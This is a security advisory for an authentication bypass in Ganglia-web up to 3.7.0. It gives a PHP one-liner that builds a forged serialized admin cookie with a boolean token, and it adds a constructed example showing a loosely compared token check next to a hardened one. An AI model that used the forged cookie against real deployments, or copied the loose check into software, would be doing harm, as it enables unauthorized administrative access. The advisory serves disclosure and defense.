First published: Mon Sep 07 2015
An authentication bypass vulnerability was found in Ganglia-web. Authentication is easily bypassed by supplying a serialized boolean as the token, like this:

```
$ php -r "echo urlencode(serialize(array('user'=>'admin','group'=>'admin', 'token'=>true)));"
```

Vulnerable code: https://github.com/ganglia/ganglia-web/blob/4e98ea69e0e18b388cdc73809ce54843a16ff87b/lib/GangliaAuth.php#L34-L46

Upstream report: https://github.com/ganglia/ganglia-web/issues/267

CVE assignment: http://seclists.org/oss-sec/2015/q3/502
Credit: cve@mitre.org
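
The type-juggling pitfall that lets a boolean token pass a loose comparison, shown next to a hardened check. This is an added example, not Ganglia-web's code: the secret, the HMAC token scheme and the function names are assumptions made for illustration, and the cookie values are constructed.

```php
<?php
// Added illustration, not Ganglia-web code. SECRET, the HMAC token scheme and
// all function names are assumptions; cookie values below are constructed.
const SECRET = 'constructed-demo-secret';

function expected_token(string $user): string
{
    return hash_hmac('sha256', $user, SECRET);
}

// Weak pattern: unserialize() restores PHP types chosen by the client, and ==
// converts a string to bool when the other operand is a bool, so a token of
// boolean true compares equal to any non-empty expected token.
function check_loose(string $cookie): bool
{
    $data = unserialize($cookie);
    return is_array($data)
        && isset($data['user'], $data['token'])
        && is_string($data['user'])
        && expected_token($data['user']) == $data['token'];
}

// Hardened: JSON cannot carry PHP objects, both fields must be strings, and
// hash_equals() compares without type juggling and in constant time.
function check_strict(string $cookie): bool
{
    $data = json_decode($cookie, true);
    if (!is_array($data)) {
        return false;
    }
    $user  = $data['user'] ?? null;
    $token = $data['token'] ?? null;
    if (!is_string($user) || !is_string($token)) {
        return false;
    }
    return hash_equals(expected_token($user), $token);
}

$forged = ['user' => 'admin', 'group' => 'admin', 'token' => true];
$valid  = ['user' => 'admin', 'group' => 'admin', 'token' => expected_token('admin')];

var_dump(check_loose(serialize($forged)));    // boolean token against the loose check
var_dump(check_strict(json_encode($forged))); // same fields against the strict check
var_dump(check_strict(json_encode($valid)));  // token derived from the secret
```
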
Affected Software | Affected Version | How to fix |
---|---|---|
Fedoraproject Fedora | =21 | |
Fedoraproject Fedora | =22 | |
Fedoraproject Fedora | =23 | |
Ganglia Ganglia-web | <=3.7.0 | |